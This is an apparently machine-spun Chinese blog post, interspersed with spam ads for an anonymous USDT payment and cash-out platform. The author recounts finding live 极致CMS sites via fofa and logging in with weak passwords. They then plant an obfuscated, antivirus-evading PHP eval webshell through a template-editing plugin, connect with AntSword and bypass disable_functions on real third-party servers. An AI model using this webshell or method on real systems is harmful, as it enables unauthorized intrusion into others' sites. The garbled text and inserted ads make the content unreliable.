欢迎访问本站!

首页科技正文

usdt交易(www.payusdt.vip):记某CMS破绽getshell

admin2021-04-0291安全技术众测渗透

USDT第三方支付平台

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

记极致CMS破绽getshell

今天下昼对照空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它举行剖析行使,sql注入,xss,后台修改上传后缀名前台getshell等等。
于是就引起了我的兴趣想去测试一下。

信息网络

照样由于自己太懒,不想搭建环境,然后就想网上有很多多少网站啊,随便找一个去看看。hhh然后去行使fofa去搜索。(不能随便乱日)

弱密码yyds

搜索了一些网站,我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。

看到后台?!嗯~,测试了sql无果,想一想万一有弱密码呢?试一试也没有啥。

然后就测试了弱密码,你懂的。

然后乐成登录~ 似乎就看到了shell就在我眼前了。

由于之前有师傅发过前台上传文件getshell了,那我这里就不举行测试了。直接寻找另一个方式getshell。

和平时的框架一样,登录后台之后就需要去测试功效点,然后我们就一个一个的去测试吧~(这里也许过了有40分钟 2333~)

唯一我感受行使点就存在系统设置中的高级设置,我们可以选择上传的后缀名,不外这里是前台的上传啊,后台虽然有上传点然则一直绕过不了。难受死了,心里又不情愿在前台上传getshell,在岂不是很没有体面(傲娇)

这里一直后台没有绕过~~~ 2333~

柳暗花明又一村

想一想,若是要行使后台,那一定是一些功效的问题,那我们就去认真找一下网站功效,找来找去就发现一个上传点,有点难受了。过了良久,突然想起了后台有一个扩展治理啊,应该说一定可以下载一下插件来加倍功效的吧。

然后就凭着感受和功效去看看那些插件可以利于。发现了一个在线编辑模板的插件

这里可能是ctfer的自觉吧~由于之前打过的ctf题基本上是可以利于编辑插件举行修改代码,就可以getshell。话不多说就最先实验。先下载了该模块并举行安装。

安装前我们照样看看安装说明。万一错误了怎么办!

意思就是我们安装的时刻还需要设置密码,而且该目录权限对照高,777就让我看到了shell的希望

然后就设置密码登录密码。

乐成登录之后就看到了这个页面我那时直接嗨了起了(np!!!)

进入这个页面,那岂不是可以修改代码了,嘿嘿嘿~ 那不是shell唾手可得!

,

Usdt第三方支付接口

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

写shell连蚁剑

测试了该插件的功效,发现只能修改代码还不能写文件,嗯~。那也简朴啊,我们先在已存在的php页面上写入一句话,然后蚁剑毗邻,确立文件写shell,之后在删除之前修改的代码。

这里分享一个免杀的小马

<?php
$a = $GLOBALS;
$str = '_POST';
eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
?>

这里写入我们的一句话木马

然后就是蚁剑去毗邻啦。看到蚁剑存在了一个绿色器械,长叹一口吻~(不外云云)

毗邻乐成居然不能执行???

心里又难受了一下~~~
然后去看看到底过滤了那些函数。而且php版本是5.6

绕disable_functions(没乐成)

然后直接上蚁剑的插件,然后发现是5.6 而且是windows 呜呜呜 不会 直接告辞~

虽然没有乐成执行下令,但也是一个getshell的思绪。

啊~烦~。然则渗透人怎么能认输~

俗话说得好,拿不下就换一个(需要表哥们可以给一些意见学习一下~)

举行网络信息

举行重复上面的操作又获得一个网站。而且照样通过弱口令获得~

弱口令yyds

getshell执行下令

这里的步骤和前面一样,由于有前面的步骤,而这个shell就简朴多了。

也乐成获得蚁剑毗邻。

而且照样不能执行下令,然则看到了linux系统就想,一定比windows很多多少了啊。

于是就最先绕disable_functions,系统信息是这样的,那直接蚁剑一把梭。

乐成绕过,这不就乐成了!!!

爽歪歪~

总结

  • 极致CMS照样存在许多破绽的。这里小弟只是抛砖引玉而已。
  • 而写到这里的时刻已经是晚上了,提权的话照样后面文章在说吧。
  • 简朴的说一下就是该破绽是主要存在于cms后台插件的位置,允许用户修改代码,而这没有过滤就造成了伟大的风险。

网友评论